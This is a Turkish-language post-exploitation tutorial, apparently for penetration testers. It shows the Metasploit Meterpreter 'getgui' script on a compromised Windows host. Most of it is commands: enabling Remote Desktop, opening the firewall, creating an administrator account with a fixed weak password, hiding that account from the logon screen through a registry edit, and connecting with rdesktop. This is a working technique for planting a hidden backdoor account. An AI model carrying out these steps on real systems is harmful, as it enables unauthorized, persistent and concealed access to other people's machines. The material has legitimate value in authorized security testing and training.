Mevcut durumda PC adlı Windows bilgisayarda SYSTEM yetkileri ile bir Meterpreter oturumu açılmıştır. Meterpreter oturumunda getgui betiğinin temel kullanımı aşağıdaki gibidir.
sessions
sessions -i 1
run getgui -h
Bu bilgisayara uzak masaüstü bağlantısı gerekleştirmek için Meterpreter oturumunda getgui betiği kullanılabilir. Bu betik ile uzak masaüstü bağlantısı etkinleştirilir, Terminal Services adlı servisin başlangıç modu otomatiğe alınır, güvenlik duvarından uzak masaüstü erişimine izin verilir, belirtilen kimlik bilgilerine göre yeni bir yönetici hesabı oluşturulabilir.
run getgui -e -p Aa123456 -u YeniKullanici
Not: Meterpreter “multi_console_command” betiğine kaynak dosyası olaran Meterpreter “getgui” betiğinin çıktısında belirtilen dosya verildiğinde oluşturulan yeni hesap silinebilir.
Not: Eğer işletim sisteminde uzak masaüstü bağlantısı gerçekleştirebilecek bir kullanıcı hesabına ait kullanıcı adı ve parola biliniyorsa yeni bir kullanıcı adı ve parola (YeniKullanici / Aa123456) belirtmeye gerek yoktur.
Böylece masaüstü bağlantısı sağlanmış olur.
rdesktop -r:disk=/tmp -u YeniKullanici -p Aa123456 192.168.74.138
Bu betik ile yapılan işlemler özet ile aşağıdaki gibidir.
reg add “HKLM\SYSTEM\CurrentControlSet\Control\Terminal Server” /v fDenyTSConnections /t REG_DWORD /d 0 /f
sc config termservice start= auto
sc start termservice
netsh firewall set service type = remotedesktop mode = enable
net user YeniKullanici Aa123456 /add
reg add “HKLM\SOFTWARE\Microsoft\Windows\ NT\CurrentVersion\Winlogon\SpecialAccounts\UserList” /v YeniKullanici /t REG_DWORD /d 0 /f
net localgroup “Remote Desktop Users” YeniKullanici /add
net localgroup “Administrators” YeniKullanici /add
Kaynak:
https://github.com/rapid7/metasploit-framework/blob/master/scripts/meterpreter/getgui.rb